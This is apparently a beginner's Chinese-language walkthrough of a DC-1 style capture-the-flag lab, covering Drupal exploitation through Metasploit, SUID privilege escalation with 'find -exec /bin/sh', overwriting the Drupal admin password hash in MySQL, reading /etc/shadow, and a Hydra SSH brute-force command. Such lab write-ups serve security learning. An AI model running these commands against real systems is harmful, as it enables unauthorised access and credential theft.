环境自己百度装好。
我的一台kali,一台DC都是52网段
1.nmap 扫一扫52网段

确定是143,然后针对143进行扫描

80开放,进去。

老熟人了 Drupal,直接msf开打

试了几个,use2直接getshell了
看看权限

尝试SUID提权
进入shell
find / -perm -4000 2>/dev/null
看到find了吧
直接提
find -exec /bin/sh \;
whoami 看看

root了。。。。
然后我看别人的文章,发现要找flag.......我是新手。。。
然后找flag吧
给他一个python的交互式
python -c 'import pty;pty.spawn("/bin/bash")'
找找flag,反正都是root了,flag不是乱翻。
第一个flag翻出来了

就在www的目录下。

每个好的cms都有配置文件
哦哦可能是让我找Drupal的配置文件吧
百度。


找到了数据库账号密码和flag2

暴力破解和字典攻击是攻击不了?只能一种方法是获取权限,你将需要权限,你用这些凭证可以做些什么

这里我实在不知道他要干嘛我都已经root了,然后看别人文章。要进cms后台。
先看看3306开没

开了,登陆进去

密码加密了

看了这篇文章
分享:忘记Drupal的管理员密码的解决办法 | Drupal China
1. 大概意思就是创建一个用户然后把密码替换掉。
2.
exit //退出mysql的shell
cd /var/www //回到网站目录
php scripts/password-hash.sh 自己设置的密码
php scripts/password-hash.sh 123456

然后进入mysql替换我们的admin管理员密码
刚刚不是生成立123456密码的加密hash嘛,替换掉
update users set pass="$S$DRpm2Iq3nyf0avZoaDyiZzkKwYE6NSSpm5l9hJntFZu9idZFXaUy" where uid=1;
登录进去了,翻一翻,找到了flag3

大概意思就是要去shadow里面找东西。
我们就直接找呗,反正一开始就已经提权了
我是root用户,我直接去翻家目录了

flag4找到了
我感觉大概意思就是让我去翻root的目录。

最终flag。
这里我看别人的文章好像使用了hydra的ssh爆破,正好我也复习一下,拿到flag3的时候让我看们去看shadows,因为我直接提权了,所以可以看,别人是看不了shadows去看了passwd,然后在passwd找到了一个flag4用户名。然后用爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.52.143 ssh -vV -f
密码是orange


















